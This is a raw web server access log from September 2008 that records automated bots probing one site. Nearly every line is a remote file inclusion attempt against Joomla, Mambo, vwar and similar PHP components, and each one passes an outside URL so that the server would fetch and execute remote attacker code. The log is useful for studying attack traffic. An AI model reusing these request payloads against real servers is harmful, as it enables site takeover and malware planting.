66.7.208.173 - - [07/Sep/2008:00:47:10 -0700] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.der-blaue-reiter.de//contenido/images/bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "theanimalnetwork.net"
62.75.184.146 - - [07/Sep/2008:00:47:36 -0700] "GET /logs/access.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.theconceptgrp.com/dotproject/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
62.75.184.146 - - [07/Sep/2008:00:47:37 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.theconceptgrp.com/dotproject/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
62.75.184.146 - - [07/Sep/2008:00:47:37 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.theconceptgrp.com/dotproject/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:00:49:21 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:00:49:21 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "theanimalnetwork.net"
84.19.180.232 - - [07/Sep/2008:00:49:58 -0700] "GET /logs/access_080723.log/!scanhttp://www.oekk.nl//cache/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
84.19.180.232 - - [07/Sep/2008:00:49:59 -0700] "GET /!scanhttp://www.oekk.nl//cache/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
84.19.180.232 - - [07/Sep/2008:00:49:59 -0700] "GET /logs/!scanhttp://www.oekk.nl//cache/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
66.103.128.44 - - [07/Sep/2008:00:50:08 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "theanimalnetwork.net"
66.103.128.44 - - [07/Sep/2008:00:50:10 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:00:52:49 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:00:52:54 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:00:52:55 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
84.19.180.232 - - [07/Sep/2008:00:53:56 -0700] "GET /!scanhttp://www.oekk.nl//cache/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
69.5.81.49 - - [07/Sep/2008:00:54:09 -0700] "GET /logs/access.log/?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
69.5.81.49 - - [07/Sep/2008:00:54:09 -0700] "GET /?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "theanimalnetwork.net"
69.5.81.49 - - [07/Sep/2008:00:54:09 -0700] "GET /logs/?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.811" "theanimalnetwork.net"
69.5.81.49 - - [07/Sep/2008:00:54:10 -0700] "GET /logs/access.log/?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
69.5.81.49 - - [07/Sep/2008:00:54:10 -0700] "GET /?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "theanimalnetwork.net"
69.5.81.49 - - [07/Sep/2008:00:54:10 -0700] "GET /logs/?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.811" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:00:54:26 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:00:54:30 -0700] "GET //skin/zero_vote/error.php?dir=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:00:54:32 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:00:54:33 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:00:54:36 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:00:54:38 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
213.218.137.36 - - [07/Sep/2008:00:55:52 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "theanimalnetwork.net"
84.19.180.232 - - [07/Sep/2008:00:56:00 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.oekk.nl//cache/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
84.19.180.232 - - [07/Sep/2008:00:56:03 -0700] "GET /logs/access.log/!scanhttp://www.oekk.nl//cache/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
84.19.180.232 - - [07/Sep/2008:00:56:03 -0700] "GET /!scanhttp://www.oekk.nl//cache/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
84.19.180.232 - - [07/Sep/2008:00:56:04 -0700] "GET /logs/!scanhttp://www.oekk.nl//cache/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
194.0.200.9 - - [07/Sep/2008:00:56:26 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
88.84.157.127 - - [07/Sep/2008:00:57:03 -0700] "GET /logs/access_080729.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
88.84.157.127 - - [07/Sep/2008:00:57:04 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
88.84.157.127 - - [07/Sep/2008:00:57:05 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
87.230.21.231 - - [07/Sep/2008:00:57:29 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
88.84.157.127 - - [07/Sep/2008:00:57:39 -0700] "GET /logs/access_080724.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
213.218.137.36 - - [07/Sep/2008:00:58:36 -0700] "GET /logs/access_080721.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "theanimalnetwork.net"
213.218.137.36 - - [07/Sep/2008:00:58:36 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "theanimalnetwork.net"
213.218.137.36 - - [07/Sep/2008:00:58:36 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "theanimalnetwork.net"
84.19.180.232 - - [07/Sep/2008:00:58:45 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.oekk.nl//cache/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
84.19.180.232 - - [07/Sep/2008:00:58:46 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.oekk.nl//cache/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
84.19.180.232 - - [07/Sep/2008:00:58:46 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.oekk.nl//cache/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
84.19.180.232 - - [07/Sep/2008:00:58:57 -0700] "GET /logs/access_080723.log/!scanhttp://www.oekk.nl//cache/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
194.0.200.9 - - [07/Sep/2008:00:59:49 -0700] "GET /logs/access_080721.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
194.0.200.9 - - [07/Sep/2008:00:59:49 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
194.0.200.9 - - [07/Sep/2008:00:59:49 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
201.6.118.215 - - [07/Sep/2008:01:00:47 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://66.7.207.244/~vivafeli/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
201.6.118.215 - - [07/Sep/2008:01:00:47 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://66.7.207.244/~vivafeli/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
87.230.21.231 - - [07/Sep/2008:01:01:51 -0700] "GET /logs/access_080721.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
87.230.21.231 - - [07/Sep/2008:01:01:51 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
87.230.21.231 - - [07/Sep/2008:01:01:54 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
213.218.137.36 - - [07/Sep/2008:01:01:56 -0700] "GET /logs/access_080723.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "theanimalnetwork.net"
213.218.137.36 - - [07/Sep/2008:01:01:56 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "theanimalnetwork.net"
213.218.137.36 - - [07/Sep/2008:01:01:57 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "theanimalnetwork.net"
69.72.133.226 - - [07/Sep/2008:01:02:17 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
69.72.133.226 - - [07/Sep/2008:01:02:18 -0700] "GET ///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
69.72.133.226 - - [07/Sep/2008:01:02:19 -0700] "GET /logs///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
194.0.200.9 - - [07/Sep/2008:01:03:52 -0700] "GET /logs/access_080723.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
194.0.200.9 - - [07/Sep/2008:01:03:52 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
194.0.200.9 - - [07/Sep/2008:01:03:52 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
87.230.21.231 - - [07/Sep/2008:01:04:55 -0700] "GET /logs/access_080723.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
87.230.21.231 - - [07/Sep/2008:01:04:55 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
87.230.21.231 - - [07/Sep/2008:01:04:56 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ich-lebe.de/images/stories/stories/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:01:04:57 -0700] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:01:04:58 -0700] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:01:05:01 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:01:05:03 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "theanimalnetwork.net"
59.106.19.213 - - [07/Sep/2008:01:06:30 -0700] "GET /logs/access.log/?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
59.106.19.213 - - [07/Sep/2008:01:06:31 -0700] "GET /?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "theanimalnetwork.net"
59.106.19.213 - - [07/Sep/2008:01:06:32 -0700] "GET /logs/?sourcedir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.805" "theanimalnetwork.net"
63.247.141.8 - - [07/Sep/2008:01:07:43 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_abhttp://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "theanimalnetwork.net"
63.247.141.8 - - [07/Sep/2008:01:07:43 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_abhttp://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:01:08:12 -0700] "GET //src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:01:08:12 -0700] "GET /logs//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "theanimalnetwork.net"
84.19.180.232 - - [07/Sep/2008:01:10:06 -0700] "GET /logs/access_080723.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.oekk.nl//cache/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
72.21.63.234 - - [07/Sep/2008:01:13:27 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
72.21.63.234 - - [07/Sep/2008:01:13:27 -0700] "GET /logs/access_080720.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
72.21.63.234 - - [07/Sep/2008:01:13:27 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
72.21.63.234 - - [07/Sep/2008:01:13:55 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.theanimalnetwork.net"
72.21.63.234 - - [07/Sep/2008:01:13:56 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.theanimalnetwork.net"
72.21.63.234 - - [07/Sep/2008:01:13:56 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.theanimalnetwork.net"
67.18.107.66 - - [07/Sep/2008:01:15:47 -0700] "GET /logs/access_080729.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
67.18.107.66 - - [07/Sep/2008:01:15:48 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
67.18.107.66 - - [07/Sep/2008:01:15:48 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
66.90.81.8 - - [07/Sep/2008:01:16:18 -0700] "GET //&mosConfig_absolute_path=http://www.der-blaue-reiter.de//contenido/images/bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "theanimalnetwork.net"
66.90.81.8 - - [07/Sep/2008:01:16:18 -0700] "GET /logs//&mosConfig_absolute_path=http://www.der-blaue-reiter.de//contenido/images/bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "theanimalnetwork.net"
67.18.107.66 - - [07/Sep/2008:01:16:28 -0700] "GET /logs/access_080724.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
66.103.128.44 - - [07/Sep/2008:01:17:17 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "theanimalnetwork.net"
66.103.128.44 - - [07/Sep/2008:01:17:19 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "theanimalnetwork.net"
72.21.63.234 - - [07/Sep/2008:01:18:42 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
72.21.63.234 - - [07/Sep/2008:01:18:42 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
72.21.63.234 - - [07/Sep/2008:01:18:43 -0700] "GET /logs/access_080720.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
72.21.63.234 - - [07/Sep/2008:01:19:12 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.theanimalnetwork.net"
72.21.63.234 - - [07/Sep/2008:01:19:13 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.theanimalnetwork.net"
72.21.63.234 - - [07/Sep/2008:01:19:13 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:01:24:41 -0700] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:01:24:43 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:01:24:47 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
